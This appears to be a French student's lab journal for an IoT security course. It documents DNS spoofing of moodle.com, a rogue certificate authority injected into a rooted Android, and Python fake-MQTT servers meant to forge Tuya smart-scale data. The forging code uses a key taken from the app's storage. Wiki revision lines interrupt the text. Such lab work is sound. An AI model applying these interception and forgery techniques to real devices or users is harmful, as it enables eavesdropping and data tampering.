</syntaxhighlight>Pour vérifier si notre configuration est correcte, on exécute ces deux commandes :

<code>sudo named-checkconf</code>

<code>sudo named-checkzone moodle.com /etc/bind/db.moodle.com</code>

== Redirection réseau ==
Dans cette partie, on ajoute une règle <code>iptables</code> pour rediriger le flux TCP vers un port local, le <code>8080</code>.

<code>iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-ports 8080</code><syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
0 0 REDIRECT 6 -- eth0 * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 redir ports 8080

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

== Serveur apache sécurise (04/10) ==

Dans un premier temps, on va créer un certificat auto-signé :

<code>openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/apache/apache-selfsigned.key -out /etc/ssl/apache/apache-selfsigned.crt -subj "/C=FR/ST=Nord/L=Lille/O=Popo/CN=moodle.com"</code>

Puis, on configure <code>Apache2</code>
<syntaxhighlight lang="linux-config">
GNU nano 7.2 /etc/apache2/sites-available/secure-site.conf
<VirtualHost *:443>
ServerName moodle.com

DocumentRoot /var/www/html

SSLEngine on
SSLCertificateFile /etc/ssl/apache/apache.crt
SSLCertificateKeyFile /etc/ssl/apache/apache.key

# Optionnel : log
ErrorLog ${APACHE_LOG_DIR}/ssl-error.log
CustomLog ${APACHE_LOG_DIR}/ssl-access.log combined
</VirtualHost>

# Redirection HTTP ^f^r HTTPS
<VirtualHost *:80>
ServerName moodle.com
Redirect permanent / https://moodle.com/
</VirtualHost>
</syntaxhighlight>

Maintenant, en prévision de la suite (voir explication dans Machine virtuelle Android), on va créer une autorité de certification nommée CertiFiable :

<code>openssl req -x509 -new -nodes -keyout ca.key -sha256 -days 365 -out ca.crt -subj "/CN=CertiFiable"</code>

Puis, on vient générer une demande de signature de certificat :

<code>openssl req -new -newkey rsa:2048 -nodes -keyout apache.key -out apache.csr -subj "/CN=moodle.com"</code>

Enfin, on vient signer le site avec le certificat de CertiFiable :

<code>openssl x509 -req -in apache.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out apache.crt -days 365 -sha256</code>

= Machine virtuelle <code>android</code> =

== Première tentative ==
Actuellement, si on navigue sur internet et que l'on se rend sur moodle.com, on atterrit bien sûr le faux Moodle, mais comme le téléphone ne connait pas l'autorité de certification nommé CertiFiable, on a le droit à ce magnifique message de connexion non sécurisée :

[[Fichier:Avertissement moodle.png|sans_cadre]][[Fichier:Moodle le magnifique.png|sans_cadre]]

Malheureusement, il est aujourd'hui impossible d'ajouter facilement une autorité de certification sur son téléphone.

C'est pour cela qu'une solution proposée est d'installer une machine virtuelle d'une ancienne version d'<code>Android</code> où il était possible d'en ajouter.

En ayant suivi ce tuto (https://help.clouding.io/hc/en-us/articles/4405454393756-How-to-virtualize-Android-with-QEMU-KVM), j'ai réussi à installer une VM sur Zabeth4 (j'ai dû prendre une autre iso car celle du site était inaccessible).

J'ai installé <code>VNC Viewer</code> pour pouvoir manipuler la machine virtuelle.

En étant sur la VM, j'ai pu me rendre compte qu'il n'était pas possible de se connecter au WiFi, c'est la connexion du pc qui est simulé comme un réseau WiFi dans la VM.

J'ai pu réfléchir à deux solutions avant que la VM ne crash d'elle-même et soit impossible à redémarrer...

La première est toute simple, connecter la Zabeth directement au WiFi, ce qui est difficile à distance. La seconde, qui est je pense possible, est de changer la carte réseau dans les fichiers de conf de la VM pour mettre celle supportant le WiFi.

Je n'ai donc pu tester aucune de ces deux solutions, la VM n'étant plus.

== Seconde tentative ==

Pour cette seconde tentative, j'utilise les commandes suivantes avec plusieurs ISO Android.<syntaxhighlight lang="linux-config">
qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw
qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw -cdrom *android-x86*.iso -boot d
qemu-system-x86_64 -m 2048 -enable-kvm -cpu host -smp 2 -display sdl -drive file=android.img,format=raw,if=virtio -usb -device usb-host,vendorid=0x148f,productid=0x5370
</syntaxhighlight>J'ai pu donc pu faire face:

- À un ISO sans les services Google et sans navigateur ...

- Un trop ancien pour Nedis

- Un qui refuse l'installation d'APK

- Un trop récent pour l'installation de certificat.

- Un qui refuse de se laisser root

En fin de séance, je n'ai malheureusement pas de VM Android fonctionnelle.

== Ultime tentative (qui marche) ==
Cette fois ci j'utilise l'application Android Studio qui permet d'émuler des téléphones Android pour le débogage d'application. On va donc s'en servir pour créer un Android routé qui va recevoir notre certificat.

Dans un premier temps j'ai donc routé mon téléphone avec l'utilitaire Magisik en suivant ce tutoriel : https://www.youtube.com/watch?v=QzsNn3GhYYk&t=374s.

Puis je viens ajouter un module dans Magisk qui permet de recharger à chaque demarrage du téléphone le certificat en question.

Le certificat peut être ajouter dans le téléphone en utilisant la commande <code>adb push xyzxyzxyz.0</code> .

La manipulation est la suivante :<syntaxhighlight lang="linux-config">
adb shell
su
cd /data/adb/modules/
mkdir -p tuya_cert/system/etc/security/cacerts
echo "id=tuya_cert" > tuya_cert/module.prop echo "name=Tuya Certificate Injection" >> tuya_cert/module.prop echo "version=1.0" >> tuya_cert/module.prop echo "versionCode=1" >> tuya_cert/module.prop echo "author=Victo" >> tuya_cert/module.prop echo "description=Injecte le certificat Tuya dans le systeme" >> tuya_cert/module.prop
touch tuya_cert/auto_mount
cp /sdcard/Download/26e33623.0 /data/adb/modules/tuya_cert/system/etc/security/cacerts/
chmod 644 /data/adb/modules/tuya_cert/system/etc/security/cacerts/26e33623.0
chown root:root /data/adb/modules/tuya_cert/system/etc/security/cacerts/26e33623.0
reboot
</syntaxhighlight>On a donc maintenant une VM Android avec notre certificat. Il faut maintenant que le PC qui host cette VM soit connecté à notre borne WiFi pour pouvoir constater que notre site Moodle.com est bien redirigé et sécurisé.

= Machine <code>Android</code> (06/10) =
Pour cette dernière partie, j'ai retrouvé une tablette sous <code>Android 4.4 KitKat</code> qui permet d'ajouter des autorités de certification.

C'est donc ce que j'ai fait :

[[Fichier:Photo_certifiable.png|sans_cadre]]

Maintenant, on constate en se connectant sur moodle.com à partir de cette tablette que l'on est bien redirigé vers le faux site et qu'il est sécurisé avec le magnifique cadenas vert.

[[Fichier:Photo moodle.png|sans_cadre]]

(cette page web date du 06/10/25, elle n'est plus valable depuis le 10/10/25...)

= Nedis Wi-Fi Smart Personal Scales =

Dans ce second TP, nous allons jouer avec ce pèse personne de nedis.

Dans un premier temps, j'ai connecté la balance au réseau SE5-SSID10.

Puis j'ai remarqué que quand je tentais de me peser, la balance affichait err2.

Après une courte investigation, il s'agit d'une balance qui émet des signaux électriques pour analyser la composition corporelle donc si on se pèse avec des chaussures, cela pose problème.

Pour la suite du projet, on se pèsera avec les mains.

[[Fichier:Poid_sur_app_nedis.png|sans_cadre]]

== Redirection du poids vers notre serveur ==
Dans un premier temps, mon idée était de faire croire à la balance qu'elle communique effectivement avec son serveur pour pouvoir récupérer les informations sur la santé de l'utilisateur.

Ici on constate sur ces paquets la requête de la balance pour obtenir une IP, puis le moment ou elle l'obtient.

[[Fichier:WS connection balance.png|sans_cadre|858x858px]]

Je peux donc ping ma balance depuis mon pc (celui qui host ma VM android)

[[Fichier:PIng balance.png|sans_cadre]]

Maintenant je veux voir les messages de communication entre la balance, son serveur et l'application, pour ce faire je fais <code>tcpdump -i eth1 -n port 53</code> :<syntaxhighlight lang="linux-config">
14:46:51.115996 IP 172.16.10.105.49153 > 172.16.10.1.53: 13861+ A? m2.tuyaeu.com. (31)
14:46:51.125611 IP 172.16.10.1.53 > 172.16.10.105.49153: 13861 3/0/0 A 3.120.92.134, A 18.184.31.90, A 35.156.44.172 (79)
14:46:51.168250 IP 172.16.10.105.49153 > 172.16.10.1.53: 59035+ A? a3.tuyaeu.com. (31)
14:46:51.177967 IP 172.16.10.1.53 > 172.16.10.105.49153: 59035 3/0/0 A 18.198.62.99, A 18.158.227.228, A 3.67.116.46 (79)
14:46:51.703179 IP 172.16.10.102.57661 > 172.16.10.1.53: 30982+ AAAA? a1.tuyaeu.com. (31)
14:46:51.706085 IP 172.16.10.102.57662 > 172.16.10.1.53: 15654+ A? a1.tuyaeu.com. (31)
14:46:51.713159 IP 172.16.10.1.53 > 172.16.10.102.57661: 30982 3/0/0 AAAA 2a05:d014:afa:af02:262a:be09:e328:ff21, AAAA 2a05:d014:afa:af01:87dc:dc67:35a1:5bfe, AAAA 2a05:d014:afa:af00:1ee2:1f00:e061:e8bf (115)
14:46:51.715736 IP 172.16.10.1.53 > 172.16.10.102.57662: 15654 3/0/0 A 3.78.92.3, A 35.159.150.3, A 3.121.33.91 (79)

56 packets captured
56 packets received by filter
0 packets dropped by kernel
[4343449.827028] device eth1 left promiscuous mode

</syntaxhighlight>visiblement notre balance communique avec tuya via m2.tuyaeu.com et a3.tuyaeu.com. Par la suite on constate qu'elle communique avec une multitude de XY.tuyaeu.com.

Maintenant on refait une config similaire à moodle.com, une zone "tuyaeu.com" dans le fichier de conf de bind, un fichier db.tuyaeu.com et une page apache. Enfin on vient la signer avec notre autorité de certification.

<code>tcpdump -i eth1 -n port 53</code> :<syntaxhighlight lang="linux-config">

12:30:58.490060 IP 172.16.10.105.49153 > 172.16.10.1.53: 50294+ A? m2.tuyaeu.com. (31)
12:30:58.490174 IP 172.16.10.1.53 > 172.16.10.105.49153: 50294* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)
12:30:58.540041 IP 172.16.10.105.49153 > 172.16.10.1.53: 23785+ A? a3.tuyaeu.com. (31)
12:30:58.540132 IP 172.16.10.1.53 > 172.16.10.105.49153: 23785* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)

</syntaxhighlight>Maintenant on constate que quand la balance demande l'adresse du serveur xy.tuyaeu.com, notre DNS lui répond avec l'IP de notre serveur.

On va créer un faux serveur pour déchiffrer ce que nous dit la balance.<syntaxhighlight lang="linux-config">
root@SE5:/etc/apache2/sites-available# openssl s_server -accept 8886 -cert /etc/ssl/apache/ca.crt -key /etc/ssl/apache/ca.key -debug
Using default temp DH parameters
ACCEPT
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
</syntaxhighlight>On constate que dès que la balance tente de se connecter elle ferme la connexion pour cause "no shared cipher".

Malheureusement, je constate (un peu tard) que notre balance ne pourra pas communiquer avec notre serveur puisque qu'elle ne possède pas le certificat de notre autorité de certification. Elle refuse donc de communiquer avec notre serveur.

Il faudrait réussir un injecter le certificat dans la balance en communicant directement avec elle.

== Envoi de fausses informations vers l'application ==

TODO redaction

L'appli tape sur 443 et 8883 (mqtt qui fonctionne avec tls) comme on peut le voir sur cet extrait:<syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# tcpdump -i eth1 -n src 172.16.10.102 and not port 53

...

11:59:46.829382 IP 172.16.10.102.53314 > 172.16.10.1.443: Flags [.], ack 1257, win 251, length 0
11:59:47.005041 IP 172.16.10.102.54915 > 172.16.10.255.54915: UDP, length 263
11:59:47.295737 IP 172.16.10.102.53313 > 172.16.10.1.8883: Flags [S], seq 3014816869, win 65535, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
11:59:47.346713 IP 172.16.10.102.53315 > 172.16.10.1.443: Flags [S], seq 1755898328, win 65535, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
11:59:47.347853 IP 172.16.10.102.53315 > 172.16.10.1.443: Flags [.], ack 273869652, win 255, length 0
11:59:47.534641 IP 172.16.10.102.53318 > 172.16.10.1.443: Flags [F.], seq 547, ack 1257, win 251, length 0

...

11:59:48.189587 IP 172.16.10.102.53319 > 172.16.10.1.443: Flags [P.], seq 517:547, ack 1256, win 251, length 30
11:59:48.190681 IP 172.16.10.102.53319 > 172.16.10.1.443: Flags [.], ack 1257, win 251, length 0
11:59:48.256593 IP 172.16.10.102.53319 > 172.16.10.1.443: Flags [F.], seq 547, ack 1257, win 251, length 0
11:59:48.324124 IP 172.16.10.102.53313 > 172.16.10.1.8883: Flags [S], seq 3014816869, win 65535, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0

</syntaxhighlight>

On va donc tenter d'envoyer des informations erronés de notre serveur vers notre application.

Dans un premier temps on va tenter d'établir une connexion sécurisé entre l'appli et notre serveur.

Tuya utilise un protocole MQTT pour les échanges de données. On va donc simuler un serveur MQTT en python qui utilise un certificat signé par notre autorité de certification.<syntaxhighlight lang="python3">
import socket
import ssl

CERT_FILE = "/etc/apache2/ssl/tuya.crt"
KEY_FILE = "/etc/apache2/ssl/tuya.key"
PORT = 8883

def start_server():
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
try:
context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)
except Exception as e:
print(f"impossible de charger les clés SSL\n{e}")
return

bindsocket = socket.socket()
bindsocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
bindsocket.bind(('0.0.0.0', PORT))
bindsocket.listen(5)

print(f"faux Serveur MQTT en écoute sur le port {PORT}...")
print("en attente de l'application Android...")

while True:
try:
newsocket, fromaddr = bindsocket.accept()
print(f"\nconnexion TCP reçue de {fromaddr[0]}")

try:
conn = context.wrap_socket(newsocket, server_side=True)
print(f"handshake SSL réussi")

data = conn.recv(1024)
print(f"données reçues ({len(data)} octets) :")
print(data)

except ssl.SSLError as e:
print(f"échec SSL rejet du certificat.\n{e}")
except Exception as e:
print(f"erreur de lecture : {e}")
finally:
pass

except KeyboardInterrupt:
print("\narrêt.")
break

if __name__ == '__main__':
start_server()
</syntaxhighlight><syntaxhighlight lang="linux-config">
connexion TCP reçue de 172.16.10.102
handshake SSL réussi
données reçues (529 octets) :
b'\x10\x8e\x04\x00\x04MQTT\x04\xce\x00<\x00lcom.nedis.smartlife_mb_e5a1220d6003e352f8b34a81cda1f2bf2e2880ce4093_d8439672c8e94a0c3446d4276d3a2abc_DEFAULT\x00\x0ftuya/smart/will\x00\xfa{"clie
ntId":"com.nedis.smartlife_mb_e5a1220d6003e352f8b34a81cda1f2bf2e2880ce4093_d8439672c8e94a0c3446d4276d3a2abc_DEFAULT","deviceType":"ANDROID","message":"","userName":"e5a1220d6003e352f8b34a81
cda1f2bf2e2880ce4093_d8439672c8e94a0c3446d4276d3a2abc"}\x00up1027735_v1_4dtc78phe7grtfdfv7fp_a4206d71_mb_eu17623708062605mpDdzpA355dad9b8086f63442d98e227e039cf5315158b056398c8fb\x00\x10388c
a5a77b82c5ad'
</syntaxhighlight>On constate à la suite de cela que notre application fait totalement confiance à notre faux serveur. Il faut maintenant le format sous lequel envoyer notre message pour quelle ajoute un poids dans l'application.
On tente donc d'envoyer en clair le poid vers l'application nedis<syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# cat fake_serv2.py
import socket
import ssl
import time
import json
import struct

# ================= CONFIGURATION =================
CERT_FILE = "/etc/ssl/apache/ssl/tuya.crt"
KEY_FILE = "/etc/ssl/apache/ssl/tuya.key"
PORT = 8883

PAYLOAD_POIDS = {
"protocol": 4,
"t": int(time.time()),
"data": {
"dps": {
"1": 8050,
"2": True,
"3": "kg"
}
}
}
# =================================================

def encode_remaining_length(length):
out = bytearray()
while True:
byte = length % 128
length //= 128
if length > 0:
byte |= 0x80
out.append(byte)
if length == 0:
break
return out

def create_mqtt_packet(pkt_type, flags, payload):
header = bytes([(pkt_type << 4) | flags])
return header + encode_remaining_length(len(payload)) + payload

def start_server():
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)

sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("0.0.0.0", PORT))
sock.listen(5)

print(f"[*] Serveur MQTT TLS prêt sur {PORT}")

while True:
client, addr = sock.accept()
print(f"\n[+] Connexion de {addr[0]}")

try:
conn = context.wrap_socket(client, server_side=True)
print("✅ TLS OK")

while True:
header = conn.recv(1)
if not header:
break

pkt_type = header[0] >> 4

# Remaining length
multiplier = 1
remaining_len = 0
while True:
b = conn.recv(1)[0]
remaining_len += (b & 127) * multiplier
multiplier *= 128
if not (b & 128):
break

payload = b""
while len(payload) < remaining_len:
payload += conn.recv(remaining_len - len(payload))

# ================= HANDLERS =================

# CONNECT
if pkt_type == 1:
print(">>> CONNECT reçu")
conn.send(b"\x20\x02\x00\x00")
print("<<< CONNACK envoyé")

# SUBSCRIBE
elif pkt_type == 8:
msg_id = payload[0:2]
topic_len = struct.unpack("!H", payload[2:4])[0]
topic = payload[4:4+topic_len].decode(errors="ignore")

print(f">>> SUBSCRIBE : {topic}")

# SUBACK (QoS 1 accepté)
suback_payload = msg_id + b"\x01"
conn.send(create_mqtt_packet(9, 0x00, suback_payload))
print("<<< SUBACK OK")

# Mapping OUT -> IN
pub_topic = topic.replace("/out/", "/in/")
print(f"📡 Publication sur : {pub_topic}")

time.sleep(0.5)

json_payload = json.dumps(PAYLOAD_POIDS)
topic_bytes = pub_topic.encode()

var_header = struct.pack("!H", len(topic_bytes)) + topic_bytes
packet_payload = var_header + json_payload.encode()

# PUBLISH QoS 1
packet = create_mqtt_packet(3, 0x02, packet_payload)
conn.send(packet)

print(f"🚀 Payload envoyé (NON chiffré)")

# PINGREQ
elif pkt_type == 12:
conn.send(b"\xd0\x00")

else:
print(f"ℹ️ Packet MQTT type {pkt_type} ignoré")

except Exception as e:
print(f"❌ Erreur connexion : {e}")

finally:
try:
conn.close()
except:
pass

if __name__ == "__main__":
start_server()

</syntaxhighlight>

On cherche dans le fichier shared_prefs dans le /data/data/com.nedis.smartlife une clé local qui permettrai de chiffrer le message pour que nedis l'accepte.<syntaxhighlight lang="linux-config">
emulator64_x86_64_arm64:/data/data/com.nedis.smartlife/shared_prefs # grep -r "localKey"

./sig_mesh_storage.xml: <string name="sig_mesheu176237y8062605m7Ddzpr3a6d803edeb314f364c55d2caab540918">[{"appkey":"2FC5C9F42A44F9D243F960231C370DC6","code":"mebf11e37fc6632a9b44qg","endTime":0,"ivIndex":0,"key":"mebf11e37fc6632a9b44qg","localKey":"674d29fb978a1705","meshId":"mebf11e37fc6632a9b44qg","meshKey":"2FC5C9F42A44F9D243F960231C370DC6","meshkey":"2FC5C9F42A44F9D243F960231C370DC6","name":"D8FBEEA2F2B93F4B63EFD7DA83424BA9","netWorkkey":"D8FBEEA2F2B93F4B63EFD7DA83424BA9","password":"fa1667ca872e46d4","pv":"2.1","resptime":0,"share":false,"startTime":0,"tempShare":false}]</string>
</syntaxhighlight><syntaxhighlight lang="linux-config">
#!/usr/bin/env python3
import socket
import ssl
import time
import json
import struct
import base64
import hashlib
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad

# ================= CONFIG =================
CERT_FILE = "/etc/ssl/apache/ssl/tuya.crt"
KEY_FILE = "/etc/ssl/apache/ssl/tuya.key"
PORT = 8883

# 🔑 LOCAL KEY 16 caractères
LOCAL_KEY = b"674d29fb978a1705"

# DPS balance (poids correct pour Nedis)
DPS_POIDS = {
"1": 8050, # 80.50 kg
"2": 1, # stable
"3": "kg"
}
# =========================================

# ---------- TUYA CRYPTO ----------
def tuya_encrypt(data: dict, local_key: bytes) -> str:
raw = json.dumps(data, separators=(',', ':')).encode()
cipher = AES.new(local_key, AES.MODE_ECB)
encrypted = cipher.encrypt(pad(raw, 16))
return base64.b64encode(encrypted).decode()

def tuya_sign(enc_data: str, ts: int, local_key: bytes) -> str:
s = f"data={enc_data}&t={ts}&key={local_key.decode()}"
return hashlib.md5(s.encode()).hexdigest()

def build_tuya_payload(dps: dict, device_id: str) -> dict:
ts = int(time.time())
enc = tuya_encrypt({
"devId": device_id,
"dps": dps
}, LOCAL_KEY)
sign = tuya_sign(enc, ts, LOCAL_KEY)
return {
"protocol": 4,
"t": ts,
"data": enc,
"sign": sign
}

def extract_device_id(topic: str) -> str:
return topic.split("/")[-1]

# ---------- MQTT UTILS ----------
def encode_remaining_length(length):
out = bytearray()
while True:
byte = length % 128
length //= 128
if length > 0:
byte |= 0x80
out.append(byte)
if length == 0:
break
return out

def create_mqtt_packet(pkt_type, flags, payload):
header = bytes([(pkt_type << 4) | flags])
return header + encode_remaining_length(len(payload)) + payload

# ---------- SERVER ----------
def start_server():
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)

sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("0.0.0.0", PORT))
sock.listen(5)

print(f"[*] Serveur MQTT TLS Tuya prêt sur {PORT}")

published_topics = set()

while True:
client, addr = sock.accept()
print(f"\n[+] Connexion de {addr[0]}")

try:
conn = context.wrap_socket(client, server_side=True)
print("✅ TLS OK")

while True:
header = conn.recv(1)
if not header:
break

pkt_type = header[0] >> 4

# Remaining length
multiplier = 1
remaining_len = 0
while True:
b = conn.recv(1)[0]
remaining_len += (b & 127) * multiplier
multiplier *= 128
if not (b & 128):
break

payload = b""
while len(payload) < remaining_len:
payload += conn.recv(remaining_len - len(payload))

# -------- HANDLERS --------
if pkt_type == 1: # CONNECT
print(">>> CONNECT")
conn.send(b"\x20\x02\x00\x00") # CONNACK OK

elif pkt_type == 8: # SUBSCRIBE
msg_id = payload[0:2]
topic_len = struct.unpack("!H", payload[2:4])[0]
topic = payload[4:4+topic_len].decode(errors="ignore")

print(f">>> SUBSCRIBE : {topic}")
conn.send(create_mqtt_packet(9, 0x00, msg_id + b"\x01")) # SUBACK QoS 1

# Publication automatique
device_id = extract_device_id(topic)
tuya_payload = build_tuya_payload(DPS_POIDS, device_id)
json_payload = json.dumps(tuya_payload)

topic_bytes = topic.encode()
var_header = struct.pack("!H", len(topic_bytes)) + topic_bytes
packet_payload = var_header + json_payload.encode()

# PUBLISH QoS 1
packet = create_mqtt_packet(3, 0x02, packet_payload)
time.sleep(0.5)
conn.send(packet)
print("🚀 POIDS TUYA CHIFFRÉ ENVOYÉ")

elif pkt_type == 4: # PUBACK
print("<<< PUBACK")

elif pkt_type == 10: # UNSUBSCRIBE
msg_id = payload[0:2]
conn.send(create_mqtt_packet(11, 0x00, msg_id))
print("<<< UNSUBACK")

elif pkt_type == 12: # PINGREQ
conn.send(b"\xd0\x00")

else:
print(f"ℹ️ MQTT type {pkt_type} ignoré")

except Exception as e:
print(f"❌ Erreur : {e}")

finally:
try:
conn.close()
except:
pass

if __name__ == "__main__":
start_server()

</syntaxhighlight>Pour autant, le poid n'est toujours pas visible dans l'application

SE5 IdO sécurité des objets 2025/2026 b1

2025-12-16T16:31:15Z

Vdetrez : /* Envoi de fausses informations vers l'application */

SE5 IdO sécurité des objets 2025/2026 b1

2025-12-16T16:29:17Z

Vdetrez : /* Envoi de fausses informations vers l'application */

SE5 IdO sécurité des objets 2025/2026 b1

2025-12-16T14:47:25Z

Vdetrez : /* Envoi de fausses informations vers l'application */

SE5 IdO sécurité des objets 2025/2026 b1

2025-12-16T13:44:25Z

Vdetrez : /* Envoi de fausses informations vers l'application */

SE5 IdO sécurité des objets 2025/2026 b1

2025-12-16T13:16:44Z

Vdetrez : /* Envoi de fausses informations vers l'application */

SE5 IdO sécurité des objets 2025/2026 b1

2025-12-11T16:33:19Z

Vdetrez : /* Seconde tentative */

SE5 IdO sécurité des objets 2025/2026 b1

2025-12-11T16:28:15Z

Vdetrez : /* Ultime tentative */

SE5 IdO sécurité des objets 2025/2026 b1

2025-12-11T16:25:43Z

Vdetrez : /* Redirection du poids vers notre serveur */

SE5 IdO sécurité des objets 2025/2026 b1

2025-12-11T16:21:17Z

Vdetrez : /* Envoi de fausses informations vers l'application */

SE5 IdO sécurité des objets 2025/2026 b1

2025-12-11T16:10:21Z

Vdetrez : /* Redirection du poids vers notre serveur */

[[Fichier:1107px-Titre page.png|sans_cadre|820x820px]]

= Serveur virtuel (17/09) =
Dans un premier temps, on vient créer un serveur virtuel sur <code>capbreton</code> avec la commande <code>xen-create-image --hostname=SE5.vdetrez --dhcp --dir=/usr/local/xen --size=10G --memory=2G --dist=daedalus --bridge=bridgeStudents</code>

Ensuite, sur capbreton dans le dossier <code>/etc/network/interfaces.d</code> on vient créer un fichier <code>g1_vdetrez</code> pour mettre en place une nouvelle interface dans le VLAN 410. <syntaxhighlight lang="linux-config">
auto Trunk.410
iface Trunk.410 inet manual
vlan-raw-device Trunk
up ip link set $IFACE up
down ip link set $IFACE down

auto g1_vdetrez
iface g1_vdetrez inet manual
bridge_ports Trunk.410
up ip link set $IFACE up
down ip link set $IFACE down

</syntaxhighlight>

On a maintenant accès à la machine SE5.vdetrez (en ayant évidemment fait l'erreur de mettre "." à la place de "-") et on vient y configurer nos adresses IPv4.

Mon adresse IPv4 routée est la <code>172.26.145.100</code> et mon IPv4 dans le VLAN 410 est <code>172.16.10.0</code> <syntaxhighlight lang="linux-config">
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
address 172.26.145.110
netmask 255.255.255.0
gateway 172.26.145.251
# post-up ethtool -K eth0 tx off

auto eth1
iface eth1 inet static
address 172.16.10.0/24
#
# The commented out line above will disable TCP checksumming which
# might resolve problems for some users. It is disabled by default
#

</syntaxhighlight>

On vérifie avec la commande <code>ip a</code><syntaxhighlight lang="linux-config">
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:41 brd ff:ff:ff:ff:ff:ff
inet 172.26.145.110/24 brd 172.26.145.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 2001:660:4401:6050:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 853sec preferred_lft 753sec
inet6 2a01:c916:2047:c850:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 2591853sec preferred_lft 604653sec
inet6 fe80::216:3eff:fe23:7441/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:42 brd ff:ff:ff:ff:ff:ff
inet 172.16.10.0/24 brd 172.16.10.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::216:3eff:fe23:7442/64 scope link
valid_lft forever preferred_lft forever

</syntaxhighlight>

Et on constate que notre serveur a accès à Internet avec la commande <code>ping 8.8.8.8</code>

= Point d'accès WiFi (29/09) =
Pour l'instant, nous mettons de côté ce point du TP car il n'est pas utile pour la suite.

= Sécurisation WiFi par WPA2-PSK =

Pour communiquer avec le routeur <code>Cisco</code>, on branche le port série en USB et on se connecte avec la commande <code>minicom -D /dev/ttyUSB0 -b 9600</code>. La première étape fut la création du SSID <code>SE5-SSID10</code>.<syntaxhighlight lang="linux-config">
dot11 ssid SE5-SSID10

vlan 410

authentication open

authentication key-management wpa version 2

wpa-psk ascii Cisco2025

exit
</syntaxhighlight>
Puis, on configure l'interface <code>Dot11Radio0</code><syntaxhighlight lang="linux-config">
interface dot11radio 0

encryption mode ciphers aes-ccm

ssid SE5-SSID10

station-role root

no shutdown
